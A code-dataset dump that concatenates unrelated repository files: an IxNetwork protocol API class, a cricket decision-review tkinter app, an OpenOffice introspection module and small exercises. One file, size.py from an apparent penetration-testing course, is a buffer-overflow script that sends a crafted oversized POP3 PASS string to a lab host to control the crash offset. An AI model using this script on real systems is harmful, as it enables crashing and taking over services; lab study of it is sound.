# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the startHello operation on the server.
Start Hello
startHello(Arg2=list, async_operation=bool)list
-----------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('startHello', payload=payload, response_object=None)
def StartSRefresh(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the startSRefresh operation on the server.
Start SRefresh
startSRefresh(Arg2=list, async_operation=bool)list
--------------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('startSRefresh', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Stop CPF control plane (equals to demote to PreValidated-DoDDone state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=list, async_operation=bool)
-----------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=string, async_operation=bool)
-------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
def StopHello(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the stopHello operation on the server.
Stop Hello
stopHello(Arg2=list, async_operation=bool)list
----------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stopHello', payload=payload, response_object=None)
def StopSRefresh(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the stopSRefresh operation on the server.
Stop SRefresh
stopSRefresh(Arg2=list, async_operation=bool)list
-------------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stopSRefresh', payload=payload, response_object=None)
def get_device_ids(self, PortNames=None, Active=None, ActualRestartTime=None, AdvertisedRestartTime=None, AuthenticationAlgorithm=None, AuthenticationKeyForReceivedPackets=None, AuthenticationKeyForSentPackets=None, AuthenticationKeyIdentifier=None, AutoGenerateAuthenticationKeyIdentifier=None, BundleMessageThresholdTime=None, CheckIntegrityForReceivedPackets=None, DutIp=None, EnableBfdRegistration=None, EnableBundleMessageSending=None, EnableBundleMessageThresholdTimer=None, EnableGracefulRestartHelperMode=None, EnableGracefulRestartRestartingMode=None, EnableHelloExtension=None, EnableRefreshReduction=None, GenerateSequenceNumberBasedOnRealTime=None, HandshakeRequired=None, HelloInterval=None, HelloTimeoutMultiplier=None, InitialSequenceNumber=None, LabelSpaceEnd=None, LabelSpaceStart=None, NumberOfRestarts=None, RecoveryTime=None, RestartStartTime=None, RestartUpTime=None, SummaryRefreshInterval=None, UseSameAuthenticationKeyForPeer=None, UsingGatewayIp=None):
"""Base class infrastructure that gets a list of rsvpteIf device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- Active (str): optional regex of active
- ActualRestartTime (str): optional regex of actualRestartTime
- AdvertisedRestartTime (str): optional regex of advertisedRestartTime
- AuthenticationAlgorithm (str): optional regex of authenticationAlgorithm
- AuthenticationKeyForReceivedPackets (str): optional regex of authenticationKeyForReceivedPackets
- AuthenticationKeyForSentPackets (str): optional regex of authenticationKeyForSentPackets
- AuthenticationKeyIdentifier (str): optional regex of authenticationKeyIdentifier
- AutoGenerateAuthenticationKeyIdentifier (str): optional regex of autoGenerateAuthenticationKeyIdentifier
- BundleMessageThresholdTime (str): optional regex of bundleMessageThresholdTime
- CheckIntegrityForReceivedPackets (str): optional regex of checkIntegrityForReceivedPackets
- DutIp (str): optional regex of dutIp
- EnableBfdRegistration (str): optional regex of enableBfdRegistration
- EnableBundleMessageSending (str): optional regex of enableBundleMessageSending
- EnableBundleMessageThresholdTimer (str): optional regex of enableBundleMessageThresholdTimer
- EnableGracefulRestartHelperMode (str): optional regex of enableGracefulRestartHelperMode
- EnableGracefulRestartRestartingMode (str): optional regex of enableGracefulRestartRestartingMode
- EnableHelloExtension (str): optional regex of enableHelloExtension
- EnableRefreshReduction (str): optional regex of enableRefreshReduction
- GenerateSequenceNumberBasedOnRealTime (str): optional regex of generateSequenceNumberBasedOnRealTime
- HandshakeRequired (str): optional regex of handshakeRequired
- HelloInterval (str): optional regex of helloInterval
- HelloTimeoutMultiplier (str): optional regex of helloTimeoutMultiplier
- InitialSequenceNumber (str): optional regex of initialSequenceNumber
- LabelSpaceEnd (str): optional regex of labelSpaceEnd
- LabelSpaceStart (str): optional regex of labelSpaceStart
- NumberOfRestarts (str): optional regex of numberOfRestarts
- RecoveryTime (str): optional regex of recoveryTime
- RestartStartTime (str): optional regex of restartStartTime
- RestartUpTime (str): optional regex of restartUpTime
- SummaryRefreshInterval (str): optional regex of summaryRefreshInterval
- UseSameAuthenticationKeyForPeer (str): optional regex of useSameAuthenticationKeyForPeer
- UsingGatewayIp (str): optional regex of usingGatewayIp
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
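
# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the generated file).
# Assuming `rsvpte_if` is an instance of this class obtained from an
# ixnetwork_restpy session (for example via .find() on its parent node; the
# session and topology layout are assumptions, not values from this module),
# the operations documented above could be driven like this:
#
#     rsvpte_if.Start(SessionIndices='1-4')        # promote selected sessions
#     hello_ids = rsvpte_if.StartHello(Arg2=[])    # empty list means all instances
#     device_ids = rsvpte_if.get_device_ids(HelloInterval='^9000$')
#     rsvpte_if.Stop(async_operation=True)         # returns before the operation completes
# ---------------------------------------------------------------------------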
| [
"[email protected]"
] | |
5b2cd57f8e2194ec3817a24a6915598c622ca1b2 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/sphinx/sphinx/sphinx/search/nl.py | 485c32c00bfbebd3c13c6fc237cc638855547bc0 | [
"LicenseRef-scancode-other-permissive",
"BSD-3-Clause"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:691f5261422e51d9e03272aae70ab30a0ad6712d65759be6a8f9a41bd904a565
size 21944
| [
"[email protected]"
] | |
ed8e7e07c105152f5bc9ba5fcc02fe65b2194e23 | b0b9f05bcfb0e366955f70753bcbd0b7fc997e7a | /pairsWithSpecificSum.py | de68f3bf37ad2534a22358946844b725ef7cd5cc | [] | no_license | mave5/pmarp | ae691e8fb3d7dc4cd51928ec240b077f09b27774 | 52aa9919e6384226ba10242144ceb5801a995071 | refs/heads/master | 2022-10-20T12:52:08.587884 | 2017-10-23T00:19:36 | 2017-10-23T00:19:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 698 | py |
# Merging 2 Packages
def get_indices_of_item_wights(arr, limit):
if len(arr)==1:
return []
#elif (len(arr)==2) and (arr[0]+arr[1]==limit):
#print arr[0],arr[1],arr[0]+arr[1]
#return []
comps={}
for i in range(0,len(arr)):
w=arr[i]
        j=comps.get(limit-w)  # look up the complement using the limit parameter (the original accidentally read the global lim)
if j is not None:
return [j,i]
else:
comps[w]=i
return []
arr = [4, 4]
lim = 8
print get_indices_of_item_wights(arr,lim)
#%%
# find a pair with specific sum
def findPairSum(arr,s):
first=0
last=len(arr)-1
while(first<last):
if (arr[first]+arr[last]>s):
last-=1
elif arr[first]+arr[last]<s:
first+=1
else:
return arr[first],arr[last]
return []
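
# Hedged usage sketch (added for illustration): get_indices_of_item_wights returns *indices*,
# while findPairSum expects an already sorted list and returns the matching *values*.
print(get_indices_of_item_wights([4, 6, 10, 15, 16], 21))   # -> [1, 3] because 6 + 15 == 21
print(findPairSum([1, 3, 5, 8, 12], 13))                    # -> (1, 12)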
| [
"[email protected]"
] | |
cbeac3af8c846564c43834c3869b02822384413f | 53b6b52a41ec415fec2a2d97cad524b8e9f8a4dc | /7_4_1/size.py | eb3ae38464d0a5f32857506357853e2ba0709ef4 | [] | no_license | xyalbino/pwk_exercises | 56b8aa359b19487733c0a9b98b9d9ed668723365 | c6af719381928164aee3c7ce8db685c7984269ec | refs/heads/master | 2020-06-14T22:21:34.571883 | 2019-03-11T22:07:44 | 2019-03-11T22:07:44 | 195,143,280 | 1 | 0 | null | 2019-07-04T00:30:30 | 2019-07-04T00:30:30 | null | UTF-8 | Python | false | false | 525 | py | #!/usr/bin/env python
import socket, sys
if __name__ == '__main__':
buff = "A" * 2606 + "B" * 4 + "C" * (3500 - 2606 - 4)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_conn = sock.connect(("10.11.21.97", 110))
data = sock.recv(1024)
print data
sock.send("USER test\r\n")
data = sock.recv(1024)
print data
sock.send("PASS {0}\r\n".format(buff))
data = sock.recv(1024)
print data
except socket.error:
print("[x] Unable to connect...")
finally:
sock.close()
sys.exit(0)
| [
"[email protected]"
] | |
e4b6e1cda54c6b2fd375df3d4a64e7a4eae646c4 | 808b96265c56807d9b1ddcbd93af00988bc3d5c1 | /main.py | 8aca8d644d250287044cfd44e73b7f42b8313317 | [] | no_license | shivamdattapurkayastha99/drs-system | b1af2d087d5ac04294dcad3fcdb921d22a4b4b27 | d35f347e6a8030c47dc0604490e360e4e63c1534 | refs/heads/master | 2023-07-06T18:35:33.594613 | 2021-08-10T20:20:20 | 2021-08-10T20:20:20 | 394,772,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,883 | py | import tkinter
import cv2
import PIL.Image,PIL.ImageTk
from functools import partial
import threading
import imutils
import time
stream=cv2.VideoCapture('clip.mp4')
def play(speed):
print(f"You clicked on play.Speed is {speed}")
frame1=stream.get(cv2.CAP_PROP_POS_FRAMES)
stream.set(cv2.CAP_PROP_POS_FRAMES,frame1+speed)
    grabbed,frame=stream.read()
    frame=cv2.cvtColor(frame,cv2.COLOR_BGR2RGB) # OpenCV reads BGR; convert to RGB before building the PIL image, as the other handlers do
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
canvas.create_text(120,25,fill="green",font="Times 20",text="Decision Pending")
def out():
thread=threading.Thread(target=pending,args=("out",))
thread.daemon=1
thread.start()
print("player is out")
def not_out():
thread=threading.Thread(target=pending,args=("not out",))
thread.daemon=1
thread.start()
print("player is not out")
def pending(decision):
frame=cv2.cvtColor(cv2.imread("pending.png"),cv2.COLOR_BGR2RGB)
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
time.sleep(1)
frame=cv2.cvtColor(cv2.imread("sponsor.png"),cv2.COLOR_BGR2RGB)
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
time.sleep(1.5)
if decision=='out':
decisionImg='out.png'
else:
decisionImg='not_out.png'
frame=cv2.cvtColor(cv2.imread(decisionImg),cv2.COLOR_BGR2RGB)
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
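
# Hedged refactor sketch (added for illustration): pending() repeats the same
# load / resize / convert / draw steps three times, so they could share a helper
# like this one (it relies on the SET_WIDTH, SET_HEIGHT and canvas globals defined below).
def show_image(path, delay=0):
    img = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)
    img = imutils.resize(img, width=SET_WIDTH, height=SET_HEIGHT)
    img = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(img))
    canvas.image = img
    canvas.create_image(0, 0, image=img, anchor=tkinter.NW)
    if delay:
        time.sleep(delay)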
SET_WIDTH=650
SET_HEIGHT=368
window=tkinter.Tk()
window.title("Shivam DRS")
cv_img=cv2.cvtColor(cv2.imread("welcome.png"),cv2.COLOR_BGR2RGB)
canvas=tkinter.Canvas(window,width=SET_WIDTH,height=SET_HEIGHT)
photo=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
image_on_canvas=canvas.create_image(0,0,anchor=tkinter.NW,image=photo)
canvas.pack()
btn=tkinter.Button(window,text="<<Previous(fast),width=50",command=partial(play,-25))
btn.pack()
btn=tkinter.Button(window,text="<<Previous(slow),width=50",command=partial(play,-2))
btn.pack()
btn=tkinter.Button(window,text="Next(fast)>>,width=50",command=partial(play,25))
btn.pack()
btn=tkinter.Button(window,text="Next(slow)>>,width=50",command=partial(play,2))
btn.pack()
btn=tkinter.Button(window,text="Give Out,width=50",command=out)
btn.pack()
btn=tkinter.Button(window,text="Give Not Out,width=50",command=not_out)
btn.pack()
window.mainloop() | [
"[email protected]"
] | |
f06b7547ea0124184f651ddac7e32fdb35e9020b | 43a38158517d5010cedc73e29b8b2342c29bdabe | /pythonpath/mytools_Mri/ui/info.py | 04290a487832b013870fbcdbf1384fae87643289 | [
"Apache-2.0"
] | permissive | billyoc/MRI | 31e14583b5de3fd6e5d770f60aaef25118c86c2b | 22cfd8bdd28cbca589b9796a6a191ce220db763d | refs/heads/master | 2021-01-17T06:47:11.945432 | 2013-03-27T05:49:37 | 2013-03-27T05:49:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,454 | py | # Copyright 2011 Tsutomu Uchino
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import traceback
import operator
try:
set()
except:
from sets import Set as set
import mytools_Mri
import mytools_Mri.values
from mytools_Mri.unovalues import TypeClass, TypeClassGroups, ParamMode
try:
long
except:
long = int
class Info(object):
def __init__(self, engine, config):
self.engine = engine
self.config = config
# informations
def get_properties_info(self, entry, config):
try:
txt = self.engine.get_properties_info(entry, config.property_only)
if config.abbrev:
abbr_old = mytools_Mri.values.ABBROLD
abbr_new = mytools_Mri.values.ABBRNEW
txt[:] = [(i[0],
i[1].replace(abbr_old, abbr_new),
i[2], i[3], i[4], i[5]) for i in txt]
if config.sorted:
try:
txt.sort(key=operator.itemgetter(0))
except:
_items = [(item[0], item) for item in txt]
_items.sort()
txt = [item for (key, item) in _items]
if config.show_labels and not config.grid:
txt.insert(0, ('(Name)', '(Value Type)', '(Value)',
'(Info.)', '(Attr.)', '(Handle)'))
mnlen = max([len(x[0]) for x in txt])
mtlen = max([len(x[1]) for x in txt])
mvlen = max([len(x[2]) for x in txt])
malen = max([len(x[4]) for x in txt])
if config.grid:
#return ((t[0], t[1], t[2], t[3], t[4], t[5]) for t in txt)
return [(t[0], t[1], t[2], t[3], t[4]) for t in txt]
else:
return ''.join([("%s %s %s %s %s %s \n" %
(t[0].ljust(mnlen), t[1].ljust(mtlen),
t[2].ljust(mvlen), t[3].ljust(8),
t[4].ljust(malen), t[5].rjust(3))) for t in txt])
except Exception as e:
print(e)
return "error"
def get_methods_info(self, entry, config):
try:
txt = self.engine.get_methods_info(entry)
if config.abbrev:
abbr_old = mytools_Mri.values.ABBROLD
abbr_new = mytools_Mri.values.ABBRNEW
txt[:] = [(i[0],
i[1].replace(abbr_old, abbr_new),
i[2].replace(abbr_old, abbr_new),
i[3].replace(abbr_old, abbr_new),
i[4].replace(abbr_old, abbr_new)) for i in txt]
if config.sorted:
try:
txt.sort(key=operator.itemgetter(0))
except:
_items = [(item[0], item) for item in txt]
_items.sort()
txt = [item for (key, item) in _items]
mnlen = max([len(x[0]) for x in txt])
malen = max([len(x[1]) for x in txt])
mrlen = max([len(x[2]) for x in txt])
mdlen = max([len(x[3]) for x in txt])
if malen > 50: malen = 50
if config.show_labels and not config.grid:
txt.insert(0, ('(Name)', '(Arguments)', '(Return Type)',
'(DeclaringClass)', '(Exceptions)'))
if config.grid:
return [(i[0], i[1], i[2], i[3], i[4]) for i in txt]
else:
return ''.join([('%s %s %s %s %s \n' %
(i[0].ljust(mnlen), i[1].ljust(malen), i[2].ljust(mrlen),
i[3].ljust(mdlen), i[4])) for i in txt])
except Exception as e:
print(e)
return "error."
def get_interfaces_listeners_info(self, entry, config):
slist = []
iinfos = self.get_interfaces_info(entry, config)
linfos = self.get_listeners_info(entry, config)
for li in linfos:
try: iinfos.remove(li)
except: pass
iinfos = list(set(iinfos))
linfos = list(set(linfos))
if config.sorted:
iinfos.sort()
linfos.sort()
if config.grid:
return [(i,) for i in iinfos] + [('',), ('Listeners',)] + [(i,) for i in linfos]
else:
return "\n".join(slist + [
"(Interfaces)", "\n".join(iinfos), '',
"(Listeners)", "\n".join(linfos)])
def get_interfaces_info(self, entry, config):
try:
#return self.engine.get_interfaces_info(self.current_entry)
return self.engine.all_interfaces_info(entry)
except Exception as e:
print(e)
def get_listeners_info(self, entry, config):
return self.engine.get_listeners_info(entry)
def get_services_info(self, entry, config):
services = []
v_services = []
try:
services = self.engine.get_services_info(entry)
if config.sorted:
services.sort()
if services and not config.grid: services.insert(0, '(Supported Service Names)')
except:
if config.grid:
return (("com.sun.star.lang.XServiceInfo interface is not supported.\n",),)
else:
return "com.sun.star.lang.XServiceInfo interface is not supported.\n"
try:
v_services = self.engine.get_available_services_info(entry)
if config.sorted:
v_services.sort()
if v_services and not config.grid: v_services.insert(0, '(Available Service Names)')
except:
pass
if config.grid:
if v_services:
return [(i,) for i in services] + [('',), ('Available Service Names',)] + [(i,) for i in v_services]
else:
return [(i,) for i in services]
else:
if v_services:
v = "\n" *2 + "\n".join(v_services)
else:
v = ""
#return "\n".join(services) + (("\n" *2 + "\n".join(v_services)) if v_services else "")
return "\n".join(services) + v
def get_struct_name(self, entry, config):
name = entry.type.getName().strip("[]")
if config.grid:
struct_name = ((name, ),)
else:
struct_name = '(Struct Name)\n%s' % name
return struct_name
def get_struct_info(self, entry, config):
try:
txt = self.engine.get_struct_info(entry)
if config.abbrev:
abbr_old = mytools_Mri.values.ABBROLD
abbr_new = mytools_Mri.values.ABBRNEW
txt[:] = [(i[0],
i[1].replace(abbr_old, abbr_new),
i[2], i[3]) for i in txt]
if config.sorted:
try:
txt.sort(key=operator.itemgetter(0))
except:
_items = [(item[0], item) for item in txt]
_items.sort()
txt = [item for (key, item) in _items]
if config.show_labels and not config.grid:
txt.insert(0, ('(Name)', '(Value Type)', '(Value)', '(AccessMode)'))
mnlen = max([len(x[0]) for x in txt])
mtlen = max([len(x[1]) for x in txt])
mvlen = max([len(x[2]) for x in txt])
if mnlen < 12: mnlen = 12
if mtlen < 16: mtlen = 16
if config.grid:
return [(t[0], t[1], t[2], '', t[3]) for t in txt]
else:
return ''.join(['%s %s %s %s\n' % (
t[0].ljust(mnlen), t[1].ljust(mtlen), t[2].ljust(mvlen), t[3]) for t in txt])
except Exception as e:
print(("get_struct_info: " + str(e)))
return "error"
def get_struct_sequence_info(self, entry, config):
"""create information about sequence of structs."""
from mytools_Mri import Entry
try:
if entry.target is None:
return 'void'
if isinstance(entry.target, tuple) and len(entry.target) == 0:
if config.grid:
return (("empty", "", "", "", ""),)
else:
return "empty"
n = entry.type.getName().count('[]')
l = list(range(len(entry.target)))
b = entry.target[:]
if n > 1:
for i in range(n -1):
l, b = get_elements(l, b)
elements = []
if len(entry.target) > 0:
for t, m in zip(b, l):
#entry = Entry(self, '', t)
#self.engine.complete(entry)
entry = self.engine.create(self, "", t)
elements.append(('(%s)' % m, self.engine.get_struct_info(entry)))
if config.abbrev:
abbr_old = mytools_Mri.values.ABBROLD
abbr_new = mytools_Mri.values.ABBRNEW
elements[:] = [
(i[0], [(j[0], j[1].replace(abbr_old, abbr_new),
j[2], j[3]) for j in i[1]]) for i in elements]
length = []
for element in elements:
length.append((max([len(x[0]) for x in element[1]]),
max([len(x[1]) for x in element[1]]),
max([len(x[2]) for x in element[1]])))
mnlen = max([x[0] for x in length])
mtlen = max([x[1] for x in length])
mvlen = max([x[2] for x in length])
if mnlen < 12: mnlen = 12
if mtlen < 16: mtlen = 16
#if config.show_labels:
if config.show_labels and not config.grid:
elements.insert(0, ('', [('(Name)', '(Value Type)', '(Value)', '(AccessMode)')]))
if config.grid:
data = []
adata = data.append
for t in elements:
adata((t[0], '', '', '', ''))
#adata((i[0], i[1], i[2], '', i[3]) for i in t[1])
for i in t[1]:
adata((i[0], i[1], i[2], '', i[3]))
return data
else:
return "\n".join(["%s\n%s" % (t[0],
"\n".join(["%s %s %s %s" % (
i[0].ljust(mnlen), i[1].ljust(mtlen),
i[2].ljust(mvlen), i[3]) for i in t[1]]
)) for t in elements]).lstrip()
except Exception as e:
print(("get_struct_sequence_info: " + str(e)))
return ''
def get_sequence_info(self, entry, config):
if config.grid:
return tuple(self.multi_array_string(entry, grid=True))
else:
return "\n".join(self.multi_array_string(entry))
def multi_array_string(self, entry, ctype="", grid=False):
value = entry.target
type_name = entry.type.getName()
n = type_name.count('[]')
if ctype == '':
ctype = type_name.strip('[]')
if grid:
if n == 1:
format = "(%03d)"
else:
format = "(%s)"
else:
if n == 1:
format = "(%03d) = %s"
else:
format = "(%s) = %s"
l = range(len(value))
b = value[:]
if n > 1:
for i in range(n -1):
l,b = get_elements(l,b)
txt = []
if ctype == 'string':
if grid:
txt = [(format % m, t, "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m,t) for t,m in zip(b,l)]
elif ctype in ['num', 'long', 'double', 'float', 'hyper', 'short']:
if grid:
txt = [(format % m, t, "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m,t) for t,m in zip(b,l)]
elif ctype == 'enum':
if grid:
txt = [(format % m, t.value, "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m,t.value) for t,m in zip(b,l)]
elif ctype == 'byte':
try:
if grid:
txt = [(format % m, hex(t), "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m, hex(t)) for t,m in zip(b,l)]
except:
if grid:
txt = [(format % m, hex(ord(t)), "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m,hex(ord(t))) for t,m in zip(b,l)]
elif ctype == 'type':
if grid:
txt = [(format % m, t.typeName, "", "", "") for t, m in zip(b,l)]
else:
txt = [format % (m,t.typeName) for t,m in zip(b,l)]
else:
if grid:
txt = [(format % m, t, "", "", "") for t, m in zip(b,l)]
else:
txt = [format % (m,t) for t,m in zip(b,l)]
#return '\n'.join(txt)
if len(txt) == 0:
if grid:
txt = (("empty", "", "", "", ""),)
else:
txt = ("empty",)
return txt
def get_elements(labels, values):
a = []
l = []
for j in range(len(values)):
p = labels[j]
d = values[j]
for i in range(len(d)):
a.append(d[i])
l.append("%03d,%03d" % (p,i))
return (l, a)
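
# Hedged illustration (added): get_elements() flattens one nesting level while keeping
# "row,col" style labels, e.g.
#     get_elements([0, 1], [["a", "b"], ["c"]])
#     -> (['000,000', '000,001', '001,000'], ['a', 'b', 'c'])
# multi_array_string() and get_struct_sequence_info() call it repeatedly to label the
# elements of multi-dimensional sequences.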
from mytools_Mri import CancelException
class ExtendedInfo(Info):
""" Supports to get or set property value. """
def make_property_value(self, property_info, old_value=None, method_info=None):
"""used to get new property value for callback."""
ARGS = TypeClassGroups.NUMERIC + [TypeClass.STRING, TypeClass.BOOLEAN]
if property_info:
prop_type = property_info.Type
if prop_type is None:
raise Exception("%s property has multiple types." % property_info.Name)
prop_name = property_info.Name
type_class = prop_type.typeClass
type_name = prop_type.typeName
elif method_info:
prop_name = method_info.getName()
return_type = method_info.getReturnType()
            type_class = return_type.getTypeClass()  # fixed typo: the UNO reflection method is getTypeClass()
type_name = return_type.getName()
else:
raise Exception()
if type_class in ARGS:
strvalue = self.engine.get_string_value(type_class, old_value)
value, state = self.dlgs.dialog_input(
"Input new value.","%s\ntype: %s\nvalue: %s" % (prop_name, type_name, strvalue))
if state:
return self.engine.get_value(value, type_name, type_class)
elif type_class == TypeClass.ENUM: # with Ref. button
strvalue = self.main.engine.get_string_value(type_class, old_value)
values = ','.join([i.Name for i in self.engine.for_name(type_name).getFields()])
value, state = self.dlgs.dialog_input2(
"Input a new value.","%s\ntype: %s\nvalue: %s\nvalues: \n%s" %
(prop_name, type_name, strvalue, values), '', type_name)
if state:
r = self.engine.get_value(value, type_name, type_class)
return r
raise CancelException('Unable to input value.')
def get_arguments(self, method):
"""used for callback to get argument."""
if not method: raise Exception('illeagal method.')
p_infos = method.getParameterInfos()
n_infos = len(p_infos)
method_name = method.Name
if n_infos == 0:
return ()
elif n_infos == 1:
if method_name in ('getByIndex', 'getByName', 'getAccessibleChild', 'getByIdentifier'):
state = False
try:
state, arg, ttype, key = self.get_arguments_for_special_methods(method)
except Exception as e:
print(e)
traceback.print_exc()
if state:
return (arg, )
# check all arguments
COMPATI_ARGS = TypeClassGroups.NUMERIC + [TypeClass.STRING, TypeClass.BOOLEAN, TypeClass.ENUM]
compati = False
for param in p_infos:
if param.aType.getTypeClass() in COMPATI_ARGS and param.aMode == ParamMode.IN:
compati = True
else:
compati = False
break
if not compati:
raise Exception('unable to get arguments from input.')
elements = []
for param in p_infos:
elements.append('%s %s %s' % (
self.engine.get_mode_string(param.aMode), param.aType.Name, param.aName))
#arg = "( %s )" % ", ".join(elements)
state, str_args = self.dlgs.dialog_elemental_input(
elements, 'input arguments', "%s(\n\t%s\n )" % (method_name, ", \n\t".join(elements)), (method.getDeclaringClass().Name, method_name))
if not state: raise CancelException("canceled.")
args = []
for param, element in zip(p_infos, str_args):
args.append(
self.engine.get_value(element, param.aType.getName(), param.aType.getTypeClass()))
return args
def get_arguments_for_special_methods(self, method):
""" """
target = self.main.current.target
method_name = method.Name
if method_name == 'getByIndex':
n = target.getCount()
selected = self.dlgs.dialog_select(tuple(range(n)))
if selected != None:
ttype = target.getElementType()
return (True, long(selected), ttype, "%s(%s)" % (method_name, selected))
elif method_name == 'getByName':
names = target.getElementNames()
selected = self.dlgs.dialog_select(names)
if selected != None:
ttype = target.getElementType()
return (True, selected, ttype, "%s(\"%s\")" % (method_name, selected))
elif method_name == 'getAccessibleChild':
n = target.getAccessibleChildCount()
selected = self.dlgs.dialog_select(tuple(range(n)))
if selected != None:
return (True, long(selected), None, "%s(%s)" % (method_name, selected))
elif method_name == 'getByIdentifier':
ids = target.getIdentifiers()
selected = self.dlgs.dialog_select(tuple([str(i) for i in ids]))
if selected is not None:
ttype = target.getElementType()
return (True, long(selected), ttype, "%s(%s)" % (method_name, selected))
return (False, None, None, None)
| [
"[email protected]"
] | |
